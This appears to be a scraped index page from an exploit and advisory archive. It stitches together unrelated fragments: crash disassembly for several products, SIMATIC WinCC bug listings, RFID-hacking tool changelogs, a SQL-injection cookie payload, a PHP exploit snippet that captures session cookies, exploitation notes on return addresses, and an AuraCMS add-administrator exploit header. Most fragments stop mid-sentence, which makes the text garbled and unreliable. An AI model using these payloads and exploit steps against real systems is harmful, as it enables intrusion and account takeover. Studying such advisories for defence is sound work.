Next Page >>
add
Classical heap overflow during the handling of the IVR files caused by
the allocation of a certain amount of data (frame size) decided by the
attacker and the copying of another arbitrary amount on the same
buffer.
From rvrender.dll (base address 63AE0000):
63AF5C70 /$ 55 PUSH EBP
63AF5C71 |. 8BEC MOV EBP,ESP
63AF5C73 |. 83EC 20 SUB ESP,20
63AF5C76 |. 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
Application: Siemens SIMATIC WinCC flexible (Runtime)
http://www.automation.siemens.com/mcms/human-machine-interface/en/visualization-software/wincc-flexible/wincc-flexible-runtime/Pages/Default.aspx
Versions: 2008 SP2 + security patch 1
Platforms: Windows
Bugs: A] HmiLoad strings stack overflow
B] HmiLoad directory traversal
C] HmiLoad various Denials of Service
D] miniweb directory traversal
E] miniweb arbitrary memory read access
Exploitation: remote
Date: 28 Nov 2011
progress, but has some goodies that make it worth releasing now...
From CHANGES:
v0.u - November 2008
add testlahf.sh script for testing LAHF units
fix -R reader type override in RFIDIOtconfig.py
add RFIDIOtconfig.py checking for global overrides in one of the
following locations (in search order):
$(RFIDIOtconfig_opts)
..
10A05C30 55 push ebp
10A05C31 8BEC mov ebp, esp
10A05C33 83EC 10 sub esp, 10
10A05C36 8B45 08 mov eax, dword ptr ss:[ebp+8]
10A05C39 0345 0C add eax, dword ptr ss:[ebp+C]
10A05C3C 8945 F8 mov dword ptr ss:[ebp-8], eax
10A05C3F 8B4D 0C mov ecx, dword ptr ss:[ebp+C]
10A05C42 894D F4 mov dword ptr ss:[ebp-C], ecx
10A05C45 8B55 F4 mov edx, dword ptr ss:[ebp-C]
10A05C48 83EA 01 sub edx, 1
certain M3U file. Winamp allocates memory by each iteration which
leads to a stack overflow exception (0xc00000fd).
You are able to simply test this bug yourself by creating a file named
'a.m3u' with the content 'a.m3u'. If you are using the standard version
of Winamp (not the Lite version) you just have to add the M3U file to
Winamp by for example simply dragging the file into the playlist.
The lite version catches the exception and exits if you add the
malformed M3U file to the playlist. If you use the "Enqueue in Winamp"
option (if configured you'll find it in the context menu) Winamp Lite
Documents'
More detail from the CHANGES file:
v0.t
add WRITE function to mrpkey.py for vonJeek JCOP emulator
(http://freeworld.thc.org/thc-epassport/)
add Makefile and vonJeek.gpsh for installing vonJeek epassport.cap to JCOP
add VONJEEK declarations for vonJeek emulator to RFIDIOt.py
set mrpkey file types to binary for windows compatibility [Jeroen van
Beek / vonJeek <vonjeek@thc.org>]
0603AD86 |. 8B97 A8000000 ||MOV EDX,DWORD PTR DS:[EDI+A8] ;
EDX = pointer to destination array
0603AD8C |. 0FB7C0 ||MOVZX EAX,AX ;
AX = words starting at offset 0x6F49F (user-controlled)
0603AD8F |. 83C4 04 ||ADD ESP,4
0603AD92 |. 6BC0 5C ||IMUL EAX,EAX,5C
0603AD95 |. 8D4C24 18 ||LEA ECX,DWORD PTR SS:[ESP+18]
0603AD99 |. 8D5410 04 ||LEA EDX,DWORD PTR DS:[EAX+EDX+4] ;
calculates the index of the array where it will write, using
user-controlled data
1.-WITHOUT ENCRYPTION:
Add cookie --> Name ~> dogarchive_user_info
--> Value ~> email=&uid=-1%20or%201=1#&seclev=
2.-WITH ENCRYPTION:
Affected Software: CMS Made Simple (version <= 1.7.1)
2. Technical details
The XSS vulnerability is found in the following modules:
- Add Pages
- Add Global Content
- Edit Global Content
- Add Article
- Add Category
- Add Field Definition
This issue did not occur on Windows XP.
Installation of Service Pack 1 and/or security updates had no effect in regards to resolve the random crashes.
To execute either the sample program or the route-add command, the user has to be member of the Network Configuration Operators group or the Administrators group.
Since this buffer overflow overwrites kernel memory, it could be possible that members of the Network Configuration Operator group exploit this and take control over the operating system without any restriction.
Impact
-----------------------------
- -----/
The vulnerability is triggered in ntdll.dll. The code corresponds to the
function RtlAllocateHeap when a new node is added to the double-linked
list of heap chunks. As can be seen, both EAX and ECX contain arbitrary
values controlled by the attacker (0x41414141). This is the Call Stack
when the crash occurs:
/-----
- Secure/Stable code base
- Web Based admin Panel
- Supports PayPal, AuthorizeNet, Real time credit card processing
- Supports UPS, USPS and Fed X shipping
- Unlimited product Specials
- Separate customer groups (Retail, Wholesale, or add your own groups)
- Compatible with most other mods available for osCommerce
(Copy of the Vendor Homepage: http://www.oscmax.com/)
> .text:0106689E movzx eax, word ptr [esi+8]
> .text:010668A2 push eax
> .text:010668A3 shl edi, 4
> .text:010668A6 call HexToNum
> .text:010668AB or edi, eax
> .text:010668AD add esi, 0Ah ; account for number of bytes (not chars) consumed by the escape.
> .text:010668B0 jmp short FinishedEscape
> .text:010668B2
> .text:010668B2 NotUnicode:
> .text:010668B2 call HexToNum ; this is the same code, but for non-unicode sequences (e.g. %41, instead of %u0041)
> .text:010668B7 mov edi, eax
To do that first we set ecx to a portion of memory which *always* (or nearly) keeps
the filename.
Look 0x01050000... no null char allowed, so I will use 0x01050101 to hit the right
offset.
To build it we need an address which points to a known call edi, compatible with
windows filenames. To achieve that you may do so:
x@pyro ~/framework-2.2/tools
$ memdump (pid) jetcast
x@pyro ~/framework-2.2/tools
$ cd ..
.text:0106689E movzx eax, word ptr [esi+8]
.text:010668A2 push eax
.text:010668A3 shl edi, 4
.text:010668A6 call HexToNum
.text:010668AB or edi, eax
.text:010668AD add esi, 0Ah ; account for number of bytes (not chars) consumed by the escape.
.text:010668B0 jmp short FinishedEscape
.text:010668B2
.text:010668B2 NotUnicode:
.text:010668B2 call HexToNum ; this is the same code, but for non-unicode sequences (e.g. %41, instead of %u0041)
.text:010668B7 mov edi, eax
(http://www.snapper.co.nz/index.html). I've also done a lot of tidying
up of the Mifare key handling code (the KeyA and KeyB stuff was probably
some of the earliest code I wrote on this project, and was pretty
broken!), as I'm starting to see a lot of live security issues with
Mifare cards and their use in applications such as hotel keys etc., so
I've added copy/clone functionality to readmifaresimple.py (note that
it's not capable of creating a true clone as we can't set the UID, but
we can copy all data blocks and set keys).
From CHANGES:
This exception may be expected and handled.
eax=0946fb98 ebx=00000040 ecx=10101010 edx=0946fb90 esi=0946eaea edi=01c1dfbc
eip=10101010 esp=0012f6cc ebp=0012f77c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
exlang32+0x101010:
10101010 001b add byte ptr [ebx],bl ds:0023:00000040=??
0:000> u eip
exlang32+0x101010:
10101010 001b add byte ptr [ebx],bl
10101012 6c ins byte ptr es:[edi],dx
10101013 0000 add byte ptr [eax],al
$s = $xpl->post($url."/index.php?","sql_pseudo=$login&sql_pass=$pass");
//Cookies
if(preg_match("#Set-Cookie: PHPSESSID=([a-z0-9]+)#i",$s,$phpsessid) && !preg_match("#name=\"sql_pseudo\"#i",$s)){
$xpl->addcookie("PHPSESSID",$phpsessid[1]);
$xpl->addcookie("sql_pseudo",$login);
$xpl->addcookie("sql_pass",md5($pass));
$xpl->addcookie("auto","off");
print "[*] PHPSESSID : $phpsessid[1]\n";
}
here.
.text:00406077 191A8 68+ push 19000h
; size_t
.text:0040607C 191AC FF+ call ds:__imp_malloc
.text:00406082 191AC 83+ add esp, 10h
.text:00406085 1919C 89+ mov [edi+14h], eax
.text:00406088 1919C 85+ test eax, eax
.text:0040608A 1919C 0F+ jz loc_406238
Once allocated data is read in 0x19000 chunks. If more than 0x4000
Hi,
One of the biggest problems with IOS exploitation is that on every
different version of IOS, the addresses required to execute useful
shellcode are different. Therefore, hard-coded addresses were inserted
into shellcode and this made exploits very version-dependent.
I have been working on a way around this and here is the first
iteration of just one of the solutions to the problem. It uses a
search routine to locate 4-byte signatures that occur near references
yourself in python, this was it... :)
From CHANGES:
v0.r
add SCM Microsystems reader support
add -d (debug) option
switch to T=1 protocol for PC/SC
add auto-detect of PC/SC reader types
fix minor reporting issues in readmifaresimple.py
fix setting of tag type 'ALL' on ACG readers (different for LF or HF)
.text:0106689E movzx eax, word ptr [esi+8]
.text:010668A2 push eax
.text:010668A3 shl edi, 4
.text:010668A6 call HexToNum
.text:010668AB or edi, eax
.text:010668AD add esi, 0Ah ; account for number of bytes (not chars) consumed by the escape.
.text:010668B0 jmp short FinishedEscape
.text:010668B2
.text:010668B2 NotUnicode:
.text:010668B2 call HexToNum ; this is the same code, but for non-unicode sequences (e.g. %41, instead of %u0041)
.text:010668B7 mov edi, eax
21| $ip = $_SERVER[ 'HTTP_CLIENT_IP' ];
22| }
23| else if ( !empty ( $_SERVER[ 'HTTP_X_FORWARDED_FOR' ] ) ) {
24| $ip = $_SERVER[ 'HTTP_X_FORWARDED_FOR' ];
25| }
26| else if ( !empty ( $_SERVER[ 'REMOTE_ADDR' ] ) ) {
27| $ip = $_SERVER[ 'REMOTE_ADDR' ];
28| }
29| else if ( getenv( "HTTP_CLIENT_IP" ) ) {
30| $ip = getenv( "HTTP_CLIENT_IP" );
31| }
Not a huge amount in this update, but I'm gonna be on the road for a
couple of weeks so I thought I'd better get it out:
fix asn1 field length calculation in mrpkey.py
add human readable config block for Q5 in readlfx.py
add Manchester encoding to RFIDIOt.py and unique.py
add serial port opening and baud rate checking for ACG / Frosch in
RFIDIOt.py
add Q5 emulation detection in lfxtype.py
#!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# AuraCMS 2.x (user.php) - Security Code Bypass & Add Administrator Exploit
# Waktu : Feb 28 2008 08:00PM
# Software : AuraCMS
# Versi : 2.0
# 2.1
# 2.2.1
Some days ago i have discovered a DoS in Windows Vista. Here is the advisory with a detailed description about the vulnerability that will help to Microsoft (they have been already notified about the bug) to correct it as soon as possible, and it will help you if you need to add any rule for your firewall.
Vulnerability and Exploit: Javier Vicente Vallejo, http://www.vallejo.cc
Vulnerability Analysis: Ruben Santamarta, http://www.reversemode.com
Abstract
Microsoft Windows is prone to a remote Kernel Denial of Service due to the way srv.sys handles malformed WRITE_ANDX SMB packets.
Remote attackers could exploit this issue without having valid credentials on the target machine. In order to achieve a successful exploitation, the attacker needs enough privileges to remotely send WRITE_ANDX packets to an interface that uses a Named Pipe as endpoint. Those interfaces that allow NULL Sessions vary between Windows versions, in Vista the reliability of a preauth attack through the “\LSARPC” has been successfully demonstrated.
From CHANGES:
v0.s
fix -L issue in RFIDIOtconfig (readernum must be 0)
add human readable dump to readmifaresimple.py (ReadablePrint() in
RFIDIOt)
fix logic in tag selection in unique.py (would not use hitag2)
add hitag2 login (password mode) to RFIDIOt.py
add hitag2bruteforce program hitag2brute.py
start migrating definitions into smaller files to aid sharing with
connect to a "known" port.
Please consult your security advisors for the best way to protect your
systems.
We are investigating additional solutions to address this vulnerability
and will notify users of any further precautions which may be taken for
additional protection."
*Credits*
Background
==========
"iTunes is a proprietary digital media player application, used for playing and
organizing digital music and video files. The program is also an interface to
manage the contents on Apple's popular iPod and other digital media players
such as the iPhone and iPad. Additionally, iTunes can connect to the iTunes
Store via the Internet to purchase and download music, music videos, television
shows, applications, iPod games, audiobooks, podcasts, feature length films and
movie rentals (not available in all countries), and ringtones (only used for
iPhone). It is also used to download applications for the iPhone and iPod touch
running iPhone OS 2.0 or later." [3]
Administrator Features:
- (NEW) New administrator skin
- (NEW) New server settings (Edit server settings, server rates, specs etc)
- (NEW) New website settings (Title, Note from the management, Contact Email, Rankings Limit)
- (NEW) Ads Management (Add, Edit & Delete)
- News management (add, edit & delete)
- Download management (add, edit & delete)
- Login
- Add administrator
- Logout (of course)
Next Page>>
|
